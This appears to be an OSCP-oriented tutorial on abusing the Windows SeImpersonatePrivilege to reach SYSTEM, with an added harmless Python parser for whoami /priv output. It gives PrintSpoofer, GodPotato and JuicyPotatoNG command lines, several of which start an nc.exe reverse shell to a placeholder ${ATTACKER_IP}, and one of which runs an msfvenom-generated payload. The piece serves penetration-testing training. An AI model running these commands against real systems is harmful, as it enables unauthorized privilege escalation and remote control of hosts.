A Classic in the Windows Privilege Escalation Toolbox For OSCP Students


The Introduction

In this write-up, I will introduce an important privilege to look for on Windows: SeImpersonatePrivilege. You can find it by executing whoami /priv, which lists the privileges held by the current user's token. The output looks like this:

[Image: an example of finding SeImpersonatePrivilege in the output of whoami /priv]

If you are doing the OSCP or CTFs at this level, it is crucial to look for SeImpersonatePrivilege and to know how to handle it when you find it. When I trained for my OSCP, an early frustration was that everyone makes abusing this privilege sound trivial. It takes practice to get the abuse working, because it depends on some details behind the scenes, but if you keep at it, it gets very easy.
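As an added example (not from the original post), here is a small Python helper that parses captured whoami /priv output in the English format shown above and reports whether the token holds the privilege, which is handy both for triaging a shell and for auditing which service accounts carry it. The sample output embedded in it is constructed, not taken from any real host, and the function names are my own.

```python
import re
from typing import Dict

# Constructed sample of `whoami /priv` output for a service-style account;
# not captured from a real host, but it follows the real three-column layout.
SAMPLE_WHOAMI_PRIV = """PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# One privilege row: name, free-text description, then Enabled/Disabled.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)$")

def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Map every privilege name in `whoami /priv` output to its State column."""
    privs: Dict[str, str] = {}
    for raw in text.splitlines():
        match = PRIV_LINE.match(raw.strip())  # strip trailing padding spaces
        if match:
            privs[match.group(1)] = match.group(3)
    return privs

def has_seimpersonate(privs: Dict[str, str]) -> bool:
    """True if the token holds SeImpersonatePrivilege, whatever its State.

    'Disabled' only means it is not switched on right now; a process that
    holds the privilege can enable it, so presence is what matters.
    """
    return "SeImpersonatePrivilege" in privs

def triage(text: str) -> str:
    """One-line verdict for a captured `whoami /priv` dump."""
    privs = parse_whoami_priv(text)
    if not privs:
        return "no privilege table found; is this really `whoami /priv` output?"
    if has_seimpersonate(privs):
        state = privs["SeImpersonatePrivilege"]
        return f"SeImpersonatePrivilege present ({state}): review why this account needs it"
    return "SeImpersonatePrivilege absent"

if __name__ == "__main__":
    print(triage(SAMPLE_WHOAMI_PRIV))
```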

The nitty-gritty details of why this privilege poses a security risk will not be covered here, as they are out of scope for the OSCP. The short story is that a proof of concept, JuicyPotato, was written to showcase how dangerous the privilege is and how easy it is to abuse. It uses named pipes and COM services to escalate to SYSTEM, the highest privilege you can get on Windows. You don't need more knowledge than that to run the exploit, but if you want to dive deeper, you can have a look here:

The Attack

There are tons of tools that can abuse this privilege, and they all use similar, but not identical, tricks. As such, for any given target machine some tools may work and others won't. My best suggestion is to get comfortable with a variety of tools and go through them one by one until you hit something that works. Here is my personal list.

PrintSpoofer

PrintSpoofer is a good way to abuse it. The first example requires an interactive shell. If you have access via RDP, you can open a terminal window and run:

./PrintSpoofer.exe -i -c cmd

And you should be good. If you have abused a web application via IIS or similar, though, your shell is likely not interactive. In that case, try running it like this:

./PrintSpoofer.exe -i -c "C:/Users/${user}/Desktop/nc.exe ${ATTACKER_IP} ${ATTACKER_PORT} -e cmd"

Note that this example requires you to transfer nc.exe to the victim machine in addition to PrintSpoofer.exe. The same goes for a few of the following examples.

GodPotato

Similar to the PrintSpoofer example above, we can use nc.exe with GodPotato too:

./GodPotato -cmd "C:/Users/${user}/Desktop/nc.exe ${ATTACKER_IP} ${ATTACKER_PORT} -e cmd"

JuicyPotatoNG — My Favorite

JuicyPotatoNG has generally been the exploit tool that I had the most success with. So the more I trained on SeImpersonatePrivilege, the more I gravitated towards this one. I would usually try it like this:

./JuicyPotatoNG.exe -t * -p "./nc.exe" -a "${ATTACKER_IP} ${ATTACKER_PORT} -e cmd"

Or alternatively with a shell.exe generated with msfvenom:

./JuicyPotatoNG.exe -t * -p "./shell.exe"

That said, JuicyPotatoNG is not magic. It does not always work.

Conclusion

The first time I learned about SeImpersonatePrivilege I was hoping to find a single tool that always worked. I did not succeed in that goal. So my best piece of advice is to get comfortable with a variety of tools and go through them in order. That way, you will always find one that works.
